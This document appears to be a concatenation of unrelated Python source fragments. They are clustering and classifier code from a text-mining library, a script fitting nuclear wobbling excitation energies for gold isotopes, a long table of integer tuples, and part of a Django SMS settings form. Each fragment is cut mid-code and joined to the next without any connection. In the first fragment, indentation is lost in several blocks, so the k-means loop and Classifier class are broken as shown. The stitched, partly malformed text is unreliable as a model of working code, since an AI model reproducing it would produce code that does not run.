for j in range(i, len(centroids)): # center1–center2 < center1–vector + vector–center2 ?
D[(i,j)] = D[(j,i)] = p * distance(centroids[i], centroids[j])
# For every vector in every cluster,
# check if it is nearer to the center of another cluster (if so, assign it).
# When visualized, this produces a Voronoi diagram.
converged = True
for i in xrange(len(clusters)):
for v in clusters[i]:
nearest, d1 = i, distance(v, centroids[i])
for j in xrange(len(clusters)):
if D[(i,j)] < d1: # Triangle inequality (Elkan, 2003).
d2 = distance(v, centroids[j])
if d2 < d1:
nearest = j
if nearest != i: # Other cluster is nearer.
clusters[nearest].append(clusters[i].pop(clusters[i].index(v)))
converged = False
iterations -= 1; #print iterations
return clusters
kmeans = k_means  # Backwards-compatible alias for k_means().
def kmpp(vectors, k, distance=COSINE):
    """ The k-means++ initialization algorithm, with the advantage that:
        - it generates better clusterings than standard k-means (RANDOM) on virtually all data sets,
        - it runs faster than standard k-means on average,
        - it has a theoretical approximation guarantee.
    """
    # Cache the distance calculations between vectors (4x faster).
    # NOTE: deliberately shadows the builtin map() and the distance argument;
    # from here on, distance() is the memoized DistanceMap.distance.
    map = DistanceMap(method=distance); distance = map.distance
    # <NAME>, 2006, http://theory.stanford.edu/~sergei/slides/BATS-Means.pdf
    # Based on:
    # http://www.stanford.edu/~darthur/kmpp.zip
    # http://yongsun.me/2008/10/k-means-and-k-means-with-python
    # Choose one center at random.
    # Calculate the distance between each vector and the nearest center.
    centroids = [choice(vectors)]
    d = [distance(v, centroids[0]) for v in vectors]
    s = sum(d)
    for _ in range(int(k) - 1):
        # Choose a random number y between 0 and d1 + d2 + ... + dn.
        # Find vector i so that: d1 + d2 + ... + di >= y > d1 + d2 + ... + dj.
        # Perform a number of local tries so that y yields a small distance sum.
        i = 0
        for _ in range(int(2 + log(k))):
            y = random() * s
            # Weighted sampling: vectors far from all current centers are
            # more likely to be picked as the next candidate center.
            for i1, v1 in enumerate(vectors):
                if y <= d[i1]:
                    break
                y -= d[i1]
            # NOTE: i1/v1 intentionally leak out of the loop above — v1 is the
            # sampled candidate and s1 the distance sum it would produce.
            s1 = sum(min(d[j], distance(v1, v2)) for j, v2 in enumerate(vectors))
            if s1 < s:
                s, i = s1, i1
        # Add vector i as a new center.
        # Repeat until we have chosen k centers.
        centroids.append(vectors[i])
        # Refresh each vector's distance to its nearest chosen center.
        d = [min(d[i], distance(v, centroids[-1])) for i, v in enumerate(vectors)]
        s = sum(d)
    # Assign points to the nearest center.
    clusters = [[] for i in xrange(int(k))]
    for v1 in vectors:
        d = [distance(v1, v2) for v2 in centroids]
        clusters[d.index(min(d))].append(v1)
    return clusters
#--- HIERARCHICAL ----------------------------------------------------------------------------------
# Slow, optimal solution guaranteed in O(len(vectors)^3).
# 100 vectors with 6 features (density 1.0): 0.1 seconds.
# 1000 vectors with 6 features (density 1.0): 1 minute.
# 3000 vectors with 6 features (density 1.0): 15 minutes.
class Cluster(list):
    """ A list subclass whose items may themselves be Cluster objects,
        forming the nested hierarchy produced by hierarchical().
    """
    def __init__(self, *args, **kwargs):
        list.__init__(self, *args, **kwargs)
    @property
    def depth(self):
        """ Yields the maximum depth of nested clusters.
            Cluster((1, Cluster((2, Cluster((3, 4)))))).depth => 2.
        """
        deepest = 0
        for node in self:
            if isinstance(node, Cluster):
                deepest = max(deepest, 1 + node.depth)
        return deepest
    def flatten(self, depth=1000):
        """ Flattens nested clusters to a list, down to the given depth.
            Cluster((1, Cluster((2, Cluster((3, 4)))))).flatten(1) => [1, 2, Cluster(3, 4)].
        """
        flat = []
        for node in self:
            if isinstance(node, Cluster) and depth > 0:
                flat += node.flatten(depth - 1)
            else:
                flat.append(node)
        return flat
    def traverse(self, visit=lambda cluster: None):
        """ Calls the visit() function on this and each nested cluster, top-down.
        """
        visit(self)
        for node in self:
            if isinstance(node, Cluster):
                node.traverse(visit)
    def __repr__(self):
        return "Cluster(%s)" % list.__repr__(self)[1:-1]
def hierarchical(vectors, k=1, iterations=1000, distance=COSINE, **kwargs):
    """ Returns a Cluster containing k items (vectors or clusters with nested items).
        With k=1, the top-level cluster contains a single cluster.
    """
    keys = kwargs.get("keys", list(features(vectors)))
    # Shuffle the vectors (random sort key) before agglomeration.
    clusters = Cluster((v for v in sorted(vectors, key=lambda x: random())))
    centroids = [(v.id, v) for v in clusters]
    map = {}
    for _ in range(iterations):
        if len(clusters) <= max(k, 1):
            break
        # Find the pair of clusters whose centroids are nearest.
        nearest, d0 = None, None
        for i, (id1, v1) in enumerate(centroids):
            for j, (id2, v2) in enumerate(centroids[i+1:]):
                # Cache the distance calculations between vectors.
                # Code is identical to DistanceMap.distance(),
                # but it is faster in the inner loop to use it directly.
                try:
                    d = map[(id1, id2)]
                except KeyError:
                    d = map[(id1, id2)] = _distance(v1, v2, method=distance)
                if d0 is None or d < d0:
                    nearest, d0 = (i, j+i+1), d
        # Pairs of nearest clusters are merged as we move up the hierarchy:
        i, j = nearest
        merged = Cluster((clusters[i], clusters[j]))
        # j > i by construction, so pop j first to keep index i valid.
        clusters.pop(j)
        clusters.pop(i)
        clusters.append(merged)
        # Cache the center of the new cluster.
        v = centroid(merged.flatten(), keys)
        centroids.pop(j)
        centroids.pop(i)
        centroids.append((v.id, v))
    return clusters
#v1 = Vector(wings=0, beak=0, claws=1, paws=1, fur=1) # cat
#v2 = Vector(wings=0, beak=0, claws=0, paws=1, fur=1) # dog
#v3 = Vector(wings=1, beak=1, claws=1, paws=0, fur=0) # bird
#print hierarchical([v1, v2, v3])
#### CLASSIFIER ####################################################################################
#--- CLASSIFIER BASE CLASS -------------------------------------------------------------------------
# The baseline (default predicted class) is set to the most frequent class:
FREQUENCY = "frequency"
class Classifier:
def __init__(self, train=[], baseline=FREQUENCY):
self._classes = {}
self._baseline = baseline
# Train on the list of Document objects or (document, type)-tuples:
for d in (isinstance(d, Document) and (d, d.type) or d for d in train):
self.train(*d)
# In Pattern 2.5-, Classifier.test() is a classmethod.
# In Pattern 2.6+, it is replaced with Classifier._test() once instantiated.
self.test = self._test
@property
def features(self):
""" Yields a list of trained features.
"""
# Must be implemented in a subclass.
return []
@property
def classes(self):
""" Yields a list of trained classes.
"""
return self._classes.keys()
terms, types = features, classes
@property
def binary(self):
""" Yields True if the classifier predicts either True (0) or False (1).
"""
return sorted(self.classes) in ([False, True], [0, 1])
@property
def distribution(self):
""" Yields a dictionary of trained (class, frequency)-items.
"""
return self._classes.copy()
@property
def majority(self):
""" Yields the majority class (= most frequent class).
"""
d = sorted((v, k) for k, v in self._classes.iteritems())
return d and d[-1][1] or None
@property
def minority(self):
""" Yields the minority class (= least frequent class).
"""
d = sorted((v, k) for k, v in self._classes.iteritems())
return d and d[0][1] or None
@property
def baseline(self):
""" Yields the most frequent class in the training data,
or a user-defined class if Classifier(baseline != FREQUENCY).
"""
if self._baseline != FREQUENCY:
return self._baseline
return ([(0, None)] + sorted([(v, k) for k, v in self._classes.iteritems()]))[-1][1]
    @property
    def skewness(self):
        """ Yields 0.0 if the classes are evenly distributed.
            Yields > +1.0 or < -1.0 if the training data is highly skewed.
        """
        # Pearson's moment coefficient of skewness: m3 / m2 ** 1.5,
        # where m_k is the k-th central moment of the class-index sample.
        def moment(a, m, k=1):
            return sum([(x-m)**k for x in a]) / (len(a) or 1)
        # List each training instance by an int that represents its class:
        a = list(chain(*([i] * v for i, (k, v) in enumerate(self._classes.iteritems()))))
        m = float(sum(a)) / len(a) # mean
        # "or 1" guards against division by zero for a zero-variance sample.
        return moment(a, m, 3) / (moment(a, m, 2) ** 1.5 or 1)
def train(self, document, type=None):
""" Trains the classifier with the given document of the given type (i.e., class).
A document can be a Document object, list or dictionary.
If no type is given, Document.type will be used instead.
"""
# Must be implemented in a subclass.
if type is None and isinstance(document, Document):
type = document.type
if type not in self._classes:
self._classes[type] = 0
self._classes[type] += 1
def classify(self, document):
""" Returns the type with the highest probability for the given document.
"""
# Must be implemented in | |
<filename>src/python/excitation_energies_fit/energies.py
import numpy as np
import plot
class Files:
    """Central registry of input data files and output plot/fit paths."""
    # main directory where everything is stored
    blobs = 'assets/'
    data_directory = blobs + 'data/'
    plot_directory = blobs + 'plots/'
    # store the experimental data for 183Au
    AU_183_DATA_POSITIVE = data_directory + '183_positive_data.md'
    AU_183_DATA_NEGATIVE = data_directory + '183_negative_data.md'
    # store the experimental data for 187Au
    # AU_187_DATA_POSITIVE = data_directory + '187_positive_data.md'
    AU_187_DATA_NEGATIVE = data_directory + '187_negative_data.md'
    # store the plots for 183Au
    AU_183_POSITIVE_ENERGY_PLOT = plot_directory + '183_positive_energies_plot.pdf'
    AU_183_NEGATIVE_ENERGY_PLOT = plot_directory + '183_negative_energies_plot.pdf'
    # store the plots for 187Au
    # AU_187_POSITIVE_ENERGY_PLOT = plot_directory + '187_positive_energies_plot.pdf'
    AU_187_NEGATIVE_ENERGY_PLOT = plot_directory + '187_negative_energies_plot.pdf'
    # fitted band energies written by the fitting routines
    AU_183_POSITIVE_FIT_DATA = data_directory + '183_Positive_Fit_Data.dat'
    AU_183_NEGATIVE_FIT_DATA = data_directory + '183_Negative_Fit_Data.dat'
    AU_187_FIT_DATA = data_directory + '187_Fit_Data.dat'
class Extract_Data:
    """Helpers for reading the experimental level-scheme data files."""
    @staticmethod
    def Get_Energies(data_file):
        """Parse a data file into the yrast and one-phonon wobbling bands.

        The first line of the file is a band label; every following line
        holds three whitespace-separated fields:
        wobbling phonon number (0 or 1), spin, energy.

        Returns a tuple (YRAST, TW1, label) where each band is a list of
        [spin, wobbling_phonon, energy] entries.
        """
        YRAST = []
        TW1 = []
        # Open read-only: the previous 'r+' mode needlessly required write
        # permission on the data file.
        with open(data_file, 'r') as data_reader:
            raw_data = data_reader.readlines()
        label = raw_data[0].strip()
        for line in raw_data[1:]:
            line = line.strip()
            if not line:
                # Tolerate blank (e.g. trailing) lines instead of crashing.
                continue
            # split() handles any run of whitespace, not just single spaces.
            wobbling_phonon, spin, energy = line.split()
            if int(wobbling_phonon) == 1:
                TW1.append(
                    [float(spin), int(wobbling_phonon), float(energy)])
            elif int(wobbling_phonon) == 0:
                YRAST.append(
                    [float(spin), int(wobbling_phonon), float(energy)])
        return YRAST, TW1, label
class Energy_Formula:
    """Analytic wobbling-energy formulas for a triaxial rotor coupled to an
    odd quasi-particle (particle-rotor model).

    Conventions:
    - I1, I2, I3 are moments of inertia, entering via A_k = 1 / (2 * I_k).
    - gamma is the triaxiality angle in DEGREES; V is the strength of the
      single-particle potential.
    - spin (I) and odd_spin (j) are angular momenta in units of hbar.
    """
    # Sentinel kept for callers that flag failed evaluations.
    FAIL_VALUE = 6969.6969
    @staticmethod
    def MeV(band):
        """Return a copy of *band* with the energy column scaled keV -> MeV."""
        band = [[e[0], e[1], float(e[2] / 1000.0)] for e in band]
        return band
    @staticmethod
    def IsNAN_Asserter(arg, assert_value):
        """Return *arg* when np.isnan(arg) == assert_value, otherwise None."""
        # Rewritten without ``assert``: assert statements are stripped under
        # ``python -O``, which would have silently disabled this check.
        if np.isnan(arg) == assert_value:
            return arg
        return None
    @staticmethod
    def Inertia_Factor(MOI):
        """Inertia factor A = 1 / (2 * MOI)."""
        return 1.0 / (2.0 * MOI)
    @staticmethod
    def Radians(angle):
        """Convert *angle* from degrees to radians."""
        return angle * np.pi / 180.0
    @staticmethod
    def B_Term(spin, odd_spin, I1, I2, I3, V, gamma):
        """Coefficient B of the quadratic (in Omega**2) secular equation."""
        A1 = Energy_Formula.Inertia_Factor(I1)
        A2 = Energy_Formula.Inertia_Factor(I2)
        A3 = Energy_Formula.Inertia_Factor(I3)
        I = spin
        j = odd_spin
        gm = Energy_Formula.Radians(gamma)
        rad3 = np.sqrt(3.0)
        cosg = np.cos(gm)
        sing = np.sin(gm)
        t1 = (2.0 * I - 1.0) * (A3 - A1) + 2.0 * j * A1
        t2 = (2.0 * I - 1.0) * (A2 - A1) + 2.0 * j * A1
        t3 = ((2.0 * j - 1.0) * (A3 - A1) + 2.0 * I * A1
              + V * (2.0 * j - 1.0) / (j * (j + 1.0)) * rad3 * (rad3 * cosg + sing))
        t4 = ((2.0 * j - 1.0) * (A2 - A1) + 2.0 * I * A1
              + V * (2.0 * j - 1.0) / (j * (j + 1.0)) * 2 * rad3 * sing)
        B = (t1 * t2) + (8.0 * A2 * A3 * I * j) + (t3 * t4)
        return -1.0 * B
    @staticmethod
    def C_Term(spin, odd_spin, I1, I2, I3, V, gamma):
        """Coefficient C of the quadratic (in Omega**2) secular equation."""
        A1 = Energy_Formula.Inertia_Factor(I1)
        A2 = Energy_Formula.Inertia_Factor(I2)
        A3 = Energy_Formula.Inertia_Factor(I3)
        I = spin
        j = odd_spin
        gm = Energy_Formula.Radians(gamma)
        rad3 = np.sqrt(3.0)
        cosg = np.cos(gm)
        sing = np.sin(gm)
        # sub_term1
        t1_1 = (2.0 * I - 1.0) * (A3 - A1) + 2.0 * j * A1
        t1_2 = ((2.0 * j - 1.0) * (A3 - A1) + 2.0 * I * A1
                + V * (2.0 * j - 1.0) / (j * (j + 1.0)) * rad3 * (rad3 * cosg + sing))
        t1_3 = 4.0 * I * j * np.power(A3, 2)
        T1 = t1_1 * t1_2 - t1_3
        # sub_term2
        t2_1 = (2.0 * I - 1.0) * (A2 - A1) + 2.0 * j * A1
        t2_2 = ((2.0 * j - 1.0) * (A2 - A1) + 2.0 * I * A1
                + V * (2.0 * j - 1.0) / (j * (j + 1.0)) * 2 * rad3 * sing)
        t2_3 = 4.0 * I * j * np.power(A2, 2)
        T2 = t2_1 * t2_2 - t2_3
        C = T1 * T2
        return C
    @staticmethod
    def H_Min(spin, odd_spin, I1, I2, I3, V, gamma):
        """Minimum (zero-point reference) of the rotational Hamiltonian."""
        A1 = Energy_Formula.Inertia_Factor(I1)
        A2 = Energy_Formula.Inertia_Factor(I2)
        A3 = Energy_Formula.Inertia_Factor(I3)
        I = spin
        j = odd_spin
        gm = Energy_Formula.Radians(gamma)
        pi6 = np.pi / 6.0
        T1 = (A2 + A3) * (I + j) / 2.0
        T2 = A1 * np.power(I - j, 2)
        T3 = V * (2.0 * j - 1.0) / (j + 1.0) * np.sin(pi6 + gm)
        H_MIN = T1 + T2 - T3
        return H_MIN
    @staticmethod
    def Omega_Frequencies(spin, odd_spin, I1, I2, I3, V, gamma, reversed=False):
        """Return the two wobbling frequencies [Omega_1, Omega_2].

        They are the roots of Omega**4 + B * Omega**2 + C = 0.  Parameter
        sets with a negative radicand yield NaN entries (callers check via
        IsNAN_Asserter).  With reversed=True the pair is swapped.
        (Dead commented-out validation scaffolding removed; ``reversed``
        shadows the builtin but the name is kept for caller compatibility.)
        """
        B = Energy_Formula.B_Term(spin, odd_spin, I1, I2, I3, V, gamma)
        C = Energy_Formula.C_Term(spin, odd_spin, I1, I2, I3, V, gamma)
        with np.errstate(invalid='ignore'):
            SQRT = np.sqrt(np.power(B, 2) - 4.0 * C)
            Omega_1 = np.sqrt(0.5 * (-B + SQRT))
            Omega_2 = np.sqrt(0.5 * (-B - SQRT))
        if reversed:
            return [Omega_2, Omega_1]
        return [Omega_1, Omega_2]
    @staticmethod
    def Energy_Expression(nw_1, nw_2, spin, odd_spin, I1, I2, I3, V, gamma):
        """Absolute energy E = H_min + Omega_1*(nw_1 + 1/2) + Omega_2*(nw_2 + 1/2)."""
        H_MIN = Energy_Formula.H_Min(spin, odd_spin, I1, I2, I3, V, gamma)
        # Use the reversed variable for the wobbling frequency ordering.
        # Depending on its value, the frequencies will be interchanged for further computations
        reversed = False
        Omega_1, Omega_2 = Energy_Formula.Omega_Frequencies(
            spin, odd_spin, I1, I2, I3, V, gamma, reversed)
        E = H_MIN + Omega_1 * (nw_1 + 0.5) + Omega_2 * (nw_2 + 0.5)
        return E
    @staticmethod
    def Excitation_Energy(nw_1, nw_2, spin, spin_zero, odd_spin, I1, I2, I3, V, gamma):
        """
        Calculates the wobbling energy of a state with given spin, belonging to a particular band, by subtracting from its absolute value the value of the yrast band-head state with I=spin_zero.
        """
        E_0 = Energy_Formula.Energy_Expression(
            0, 0, spin_zero, odd_spin, I1, I2, I3, V, gamma)
        E_I = Energy_Formula.Energy_Expression(
            nw_1, nw_2, spin, odd_spin, I1, I2, I3, V, gamma)
        E_EXC = E_I - E_0
        return E_EXC
class Models:
@staticmethod
def Model_Energy_h9_2(X, P_1, P_2, P_3, P_4, P_5):
"""
Describes the analytical expressions for the energies that correspond to the negative parity states.
This is the model function that needs to be numerically fitted.
The argument X represents the spin I and the wobbling phonon number n_w -> X = [I, n_w1].
P represents the parameter set: P = [I1, I2, I3, V, gamma].
"""
DEBUG_MODE = False
# The band head of the negative parity sequences
# Band head corresponds to the first level of the yrast band
SPIN_ZERO = 4.5
# The odd single-particle angular momentum which couples to the triaxial even-even core
ODD_SPIN = 4.5
# unpack the spin and wobbling phonon number
spins, phonons = X
if(DEBUG_MODE):
print(f'in model ->Spins: {spins}\n nw_1: {phonons}')
model_function = Energy_Formula.Excitation_Energy(
phonons, 0, spins, SPIN_ZERO, ODD_SPIN, P_1, P_2, P_3, P_4, P_5)
if(DEBUG_MODE):
print(f'E_EXC(X,P) -> {model_function}')
return model_function
@staticmethod
def Model_Energy_i13_2(X, P_1, P_2, P_3, P_4, P_5):
"""
Describes the analytical expressions for the energies that correspond to the positive parity states.
This is the model function that needs to be numerically fitted.
The argument X represents the spin I and the wobbling phonon number n_w -> X = [I, n_w1].
P represents the parameter set: P = [I1, I2, I3, V, gamma].
"""
DEBUG_MODE = False
# The band head of the positive parity sequences
# Band head corresponds to the first level of the yrast band
SPIN_ZERO = 6.5
# The odd single-particle | |
20, 1, 5): (-1, 1),
(6, 20, 2, -5): (0, 1),
(6, 20, 2, -4): (0, 1),
(6, 20, 2, -3): (0, 1),
(6, 20, 2, -2): (0, 1),
(6, 20, 2, -1): (0, 1),
(6, 20, 2, 0): (-1, 1),
(6, 20, 2, 1): (-1, 1),
(6, 20, 2, 2): (-1, 1),
(6, 20, 2, 3): (-1, 0),
(6, 20, 2, 4): (-1, -1),
(6, 20, 2, 5): (-1, -1),
(6, 20, 3, -5): (1, 1),
(6, 20, 3, -4): (1, 1),
(6, 20, 3, -3): (1, 1),
(6, 20, 3, -2): (1, 0),
(6, 20, 3, -1): (1, 1),
(6, 20, 3, 0): (1, 1),
(6, 20, 3, 1): (1, 1),
(6, 20, 3, 2): (0, 1),
(6, 20, 3, 3): (0, 1),
(6, 20, 3, 4): (0, 1),
(6, 20, 3, 5): (0, 1),
(6, 20, 4, -5): (0, 1),
(6, 20, 4, -4): (0, 1),
(6, 20, 4, -3): (0, 1),
(6, 20, 4, -2): (0, 0),
(6, 20, 4, -1): (0, 1),
(6, 20, 4, 0): (0, 1),
(6, 20, 4, 1): (0, 1),
(6, 20, 4, 2): (-1, 1),
(6, 20, 4, 3): (-1, 1),
(6, 20, 4, 4): (-1, 1),
(6, 20, 4, 5): (-1, 1),
(6, 20, 5, -5): (0, 1),
(6, 20, 5, -4): (0, 1),
(6, 20, 5, -3): (0, 1),
(6, 20, 5, -2): (0, 0),
(6, 20, 5, -1): (0, 1),
(6, 20, 5, 0): (0, 1),
(6, 20, 5, 1): (0, 1),
(6, 20, 5, 2): (0, 1),
(6, 20, 5, 3): (0, 1),
(6, 20, 5, 4): (0, 1),
(6, 20, 5, 5): (0, 1),
(6, 21, -5, -5): (0, 1),
(6, 21, -5, -4): (0, 1),
(6, 21, -5, -3): (0, 0),
(6, 21, -5, -2): (0, 1),
(6, 21, -5, -1): (0, 1),
(6, 21, -5, 0): (0, 1),
(6, 21, -5, 1): (0, 1),
(6, 21, -5, 2): (0, 1),
(6, 21, -5, 3): (0, 1),
(6, 21, -5, 4): (0, 1),
(6, 21, -5, 5): (0, 1),
(6, 21, -4, -5): (0, 1),
(6, 21, -4, -4): (0, 1),
(6, 21, -4, -3): (0, 0),
(6, 21, -4, -2): (0, 1),
(6, 21, -4, -1): (0, 1),
(6, 21, -4, 0): (0, 1),
(6, 21, -4, 1): (0, 1),
(6, 21, -4, 2): (0, 1),
(6, 21, -4, 3): (0, 1),
(6, 21, -4, 4): (0, 1),
(6, 21, -4, 5): (0, 1),
(6, 21, -3, -5): (0, 1),
(6, 21, -3, -4): (0, 1),
(6, 21, -3, -3): (0, 0),
(6, 21, -3, -2): (0, 1),
(6, 21, -3, -1): (0, 1),
(6, 21, -3, 0): (0, 1),
(6, 21, -3, 1): (0, 1),
(6, 21, -3, 2): (0, 1),
(6, 21, -3, 3): (0, 1),
(6, 21, -3, 4): (0, 1),
(6, 21, -3, 5): (0, 1),
(6, 21, -2, -5): (0, 1),
(6, 21, -2, -4): (0, 1),
(6, 21, -2, -3): (0, 0),
(6, 21, -2, -2): (0, 1),
(6, 21, -2, -1): (0, 1),
(6, 21, -2, 0): (0, 1),
(6, 21, -2, 1): (0, 1),
(6, 21, -2, 2): (0, 1),
(6, 21, -2, 3): (0, 1),
(6, 21, -2, 4): (0, 1),
(6, 21, -2, 5): (0, 1),
(6, 21, -1, -5): (0, 1),
(6, 21, -1, -4): (0, 1),
(6, 21, -1, -3): (0, 0),
(6, 21, -1, -2): (0, 1),
(6, 21, -1, -1): (0, 1),
(6, 21, -1, 0): (1, 1),
(6, 21, -1, 1): (1, 1),
(6, 21, -1, 2): (1, 1),
(6, 21, -1, 3): (1, 1),
(6, 21, -1, 4): (1, 1),
(6, 21, -1, 5): (1, 0),
(6, 21, 0, -5): (-1, 1),
(6, 21, 0, -4): (-1, 1),
(6, 21, 0, -3): (-1, 0),
(6, 21, 0, -2): (-1, 1),
(6, 21, 0, -1): (1, 1),
(6, 21, 0, 0): (1, 1),
(6, 21, 0, 1): (1, 1),
(6, 21, 0, 2): (1, 1),
(6, 21, 0, 3): (0, 1),
(6, 21, 0, 4): (0, 1),
(6, 21, 0, 5): (0, 1),
(6, 21, 1, -5): (1, 1),
(6, 21, 1, -4): (1, 1),
(6, 21, 1, -3): (1, 1),
(6, 21, 1, -2): (1, 1),
(6, 21, 1, -1): (0, 1),
(6, 21, 1, 0): (0, 1),
(6, 21, 1, 1): (0, 1),
(6, 21, 1, 2): (0, 1),
(6, 21, 1, 3): (-1, 1),
(6, 21, 1, 4): (-1, 1),
(6, 21, 1, 5): (-1, 1),
(6, 21, 2, -5): (0, 1),
(6, 21, 2, -4): (0, 1),
(6, 21, 2, -3): (0, 1),
(6, 21, 2, -2): (0, 1),
(6, 21, 2, -1): (-1, 1),
(6, 21, 2, 0): (-1, 1),
(6, 21, 2, 1): (-1, 1),
(6, 21, 2, 2): (-1, 1),
(6, 21, 2, 3): (-1, 1),
(6, 21, 2, 4): (-1, 0),
(6, 21, 2, 5): (-1, -1),
(6, 21, 3, -5): (1, 1),
(6, 21, 3, -4): (1, 1),
(6, 21, 3, -3): (1, 0),
(6, 21, 3, -2): (1, 1),
(6, 21, 3, -1): (1, 1),
(6, 21, 3, 0): (1, 1),
(6, 21, 3, 1): (1, 1),
(6, 21, 3, 2): (0, 1),
(6, 21, 3, 3): (0, 1),
(6, 21, 3, 4): (1, 1),
(6, 21, 3, 5): (1, 0),
(6, 21, 4, -5): (0, 1),
(6, 21, 4, -4): (0, 1),
(6, 21, 4, -3): (0, 0),
(6, 21, 4, -2): (0, 1),
(6, 21, 4, -1): (0, 1),
(6, 21, 4, 0): (0, 1),
(6, 21, 4, 1): (0, 1),
(6, 21, 4, 2): (-1, 1),
(6, 21, 4, 3): (-1, 1),
(6, 21, 4, 4): (0, 1),
(6, 21, 4, 5): (0, 1),
(6, 21, 5, -5): (0, 1),
(6, 21, 5, -4): (0, 1),
(6, 21, 5, -3): (0, 0),
(6, 21, 5, -2): (0, 1),
(6, 21, 5, -1): (0, 1),
(6, 21, 5, 0): (0, 1),
(6, 21, 5, 1): (0, 1),
(6, 21, 5, 2): (0, 1),
(6, 21, 5, 3): (0, 1),
(6, 21, 5, 4): (0, 1),
(6, 21, 5, 5): (0, 1),
(6, 22, -5, -5): (0, 1),
(6, 22, -5, -4): (0, 0),
(6, 22, -5, -3): (0, 1),
(6, 22, -5, -2): (0, 1),
(6, 22, -5, -1): (0, 1),
(6, 22, -5, 0): (0, 1),
(6, 22, -5, 1): (0, 1),
(6, 22, -5, 2): (0, 1),
(6, 22, -5, 3): (0, 1),
(6, 22, -5, 4): (0, 1),
(6, 22, -5, 5): (0, 1),
(6, 22, -4, -5): (0, 1),
(6, 22, -4, -4): (0, 0),
(6, 22, -4, -3): (0, 1),
(6, 22, -4, -2): (0, 1),
(6, 22, -4, -1): (0, 1),
(6, 22, -4, 0): (0, 1),
(6, 22, -4, 1): (0, 1),
(6, 22, -4, 2): (0, 1),
(6, 22, -4, 3): (0, 1),
(6, 22, -4, 4): (0, 1),
(6, 22, -4, 5): (0, 1),
(6, 22, -3, -5): (0, 1),
(6, 22, -3, -4): (0, 0),
(6, 22, -3, -3): (0, 1),
(6, 22, -3, -2): (0, 1),
(6, 22, -3, -1): (0, 1),
(6, 22, -3, 0): (0, 1),
(6, 22, -3, 1): (0, 1),
(6, 22, -3, 2): (0, 1),
(6, 22, -3, 3): (0, 1),
(6, 22, -3, 4): (0, 1),
(6, 22, -3, 5): (0, 1),
(6, 22, -2, -5): (0, 1),
(6, 22, -2, -4): (0, 0),
(6, 22, -2, -3): (0, 1),
(6, 22, -2, -2): (0, 1),
(6, 22, -2, -1): (0, 1),
(6, 22, -2, 0): (0, 1),
(6, 22, -2, 1): (0, 1),
(6, 22, -2, 2): (0, 1),
(6, 22, -2, 3): (0, 1),
(6, 22, -2, 4): (0, 1),
(6, 22, -2, 5): (0, 1),
(6, 22, -1, -5): (0, 1),
(6, 22, -1, -4): (0, 0),
(6, 22, -1, -3): (0, 1),
(6, 22, -1, | |
counts as being read only "
"to the user who reads it."),
),
]
return crispy.Fieldset(
_("Chat Settings"),
*fields
)
@property
def section_internal(self):
return crispy.Fieldset(
_("Internal Settings (Dimagi Only)"),
hqcrispy.B3MultiField(
_("Override Daily Outbound SMS Limit"),
crispy.Div(
InlineField(
'override_daily_outbound_sms_limit',
data_bind='value: override_daily_outbound_sms_limit',
),
css_class='col-sm-4'
),
crispy.Div(
InlineField('custom_daily_outbound_sms_limit'),
data_bind="visible: override_daily_outbound_sms_limit() === '%s'" % ENABLED,
css_class='col-sm-8'
),
),
hqcrispy.B3MultiField(
_("Chat Template"),
crispy.Div(
InlineField(
"use_custom_chat_template",
data_bind="value: use_custom_chat_template",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_chat_template",
data_bind="visible: showCustomChatTemplate",
),
css_class='col-sm-8'
),
help_bubble_text=_("To use a custom template to render the "
"chat window, enter it here."),
css_id="custom-chat-template-group",
),
)
@property
def sections(self):
result = [
self.section_general,
self.section_registration,
self.section_chat,
]
if self._cchq_is_previewer:
result.append(self.section_internal)
result.append(
hqcrispy.FormActions(
twbscrispy.StrictButton(
_("Save"),
type="submit",
css_class="btn-primary",
),
),
)
return result
def __init__(self, data=None, cchq_domain=None, cchq_is_previewer=False, *args, **kwargs):
self._cchq_domain = cchq_domain
self._cchq_is_previewer = cchq_is_previewer
super(SettingsForm, self).__init__(data, *args, **kwargs)
self.helper = HQFormHelper()
self.helper.layout = crispy.Layout(
*self.sections
)
self.restricted_sms_times_widget_context = {
"template_name": "ko-template-restricted-sms-times",
"explanation_text": _("SMS will only be sent when any of the following is true:"),
"ko_array_name": "restricted_sms_times",
"remove_window_method": "$parent.removeRestrictedSMSTime",
"add_window_method": "addRestrictedSMSTime",
}
self.sms_conversation_times_widget_context = {
"template_name": "ko-template-sms-conversation-times",
"explanation_text": _("Automated SMS will be suppressed during "
"chat conversations when any of the following "
"is true:"),
"ko_array_name": "sms_conversation_times",
"remove_window_method": "$parent.removeSMSConversationTime",
"add_window_method": "addSMSConversationTime",
}
@property
def enable_registration_welcome_sms_for_case(self):
return (self.cleaned_data.get('registration_welcome_message') in
(WELCOME_RECIPIENT_CASE, WELCOME_RECIPIENT_ALL))
@property
def enable_registration_welcome_sms_for_mobile_worker(self):
return (self.cleaned_data.get('registration_welcome_message') in
(WELCOME_RECIPIENT_MOBILE_WORKER, WELCOME_RECIPIENT_ALL))
@property
def current_values(self):
current_values = {}
for field_name in self.fields.keys():
value = self[field_name].value()
if field_name in ["restricted_sms_times_json", "sms_conversation_times_json"]:
if isinstance(value, str):
current_values[field_name] = json.loads(value)
else:
current_values[field_name] = value
elif field_name in ['sms_case_registration_owner_id', 'sms_case_registration_user_id']:
if value:
obj = self.get_user_group_or_location(value)
if isinstance(obj, SQLLocation):
current_values[field_name] = {'id': value, 'text': _("Organization: {}").format(obj.name)}
elif isinstance(obj, Group):
current_values[field_name] = {'id': value, 'text': _("User Group: {}").format(obj.name)}
elif isinstance(obj, CommCareUser):
current_values[field_name] = {'id': value, 'text': _("User: {}").format(obj.raw_username)}
else:
current_values[field_name] = value
return current_values
def _clean_dependent_field(self, bool_field, field):
if self.cleaned_data.get(bool_field):
value = self.cleaned_data.get(field, None)
if not value:
raise ValidationError(_("This field is required."))
return value
else:
return None
def clean_use_default_sms_response(self):
return self.cleaned_data.get("use_default_sms_response") == ENABLED
def clean_default_sms_response(self):
return self._clean_dependent_field("use_default_sms_response",
"default_sms_response")
def clean_use_custom_case_username(self):
return self.cleaned_data.get("use_custom_case_username") == CUSTOM
def clean_custom_case_username(self):
return self._clean_dependent_field("use_custom_case_username",
"custom_case_username")
def clean_use_custom_message_count_threshold(self):
return (self.cleaned_data.get("use_custom_message_count_threshold")
== CUSTOM)
def clean_custom_message_count_threshold(self):
value = self._clean_dependent_field("use_custom_message_count_threshold",
"custom_message_count_threshold")
if value is not None and value <= 0:
raise ValidationError(_("Please enter a positive number"))
return value
def clean_use_custom_chat_template(self):
if not self._cchq_is_previewer:
return None
